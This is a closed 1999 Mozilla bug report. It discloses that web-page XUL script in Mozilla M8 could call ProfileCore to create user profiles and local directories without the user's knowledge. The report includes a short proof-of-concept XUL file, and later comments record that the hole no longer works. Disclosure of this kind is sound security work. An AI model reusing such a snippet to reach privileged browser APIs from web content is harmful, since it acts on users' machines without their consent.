Closed Bug 10263 Opened 26 years ago Closed 26 years ago

Script may create profiles and local directories

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED WORKSFORME

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

Mozilla 5.0 M8 Win95 (guess all platforms) allows creating profiles and local directories without user's knowledge. For details, examine the XUL code: -----------------------------prof1.xul------------------------- <?xml version="1.0"?> <!DOCTYPE window> <window xmlns:html="http://www.w3.org/TR/REC-html40" xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" title = "Creating profiles and local directories"> <html:script> <![CDATA[ // The profile and directory to be created var data="ProfileName=guninski%ProfileDir=C:\\guninskix%"; var profileCore = XPAppCoresManager.Find("ProfileCore"); if (!profileCore) { profileCore = new ProfileCore(); if (profileCore) { profileCore.Init("ProfileCore"); } else { dump("profile not created\n"); } } if (profileCore) { profileCore.CreateNewProfile(data); } ]]> </html:script> <html:h3> This page adds a user profile and creates a directory C:\guninskix. <html:br> </html:h3> </window> ---------------------------------------------------------------
Status: NEW → ASSIGNED
The XPAppCoresManager shouldn't be accessible from web JavaScript. Is it?
It is accessible from web JavaScript. Check: http://www.nat.bg/~joro/mozilla/prof1.xul Tested with M8 and build 1999080508
Target Milestone: M11
Blocks: 12633
Depends on: 13021
I now get an error from the XML parser.
Appcores are going away...(and I'm removing them myself since noone else seems to want to) I would just mark this invalid.
I think this bug is fixed because the new profile manager uses XPConnect instead of AppCore. Anyway I fixed the XML parser error and the new error is: "JavaScript Error: ReferenceError: ProfileCore is not defined "
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → WORKSFORME
Now get the error JavaScript Error: ReferenceError: ProfileCore is not defined
Verified worksforme.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.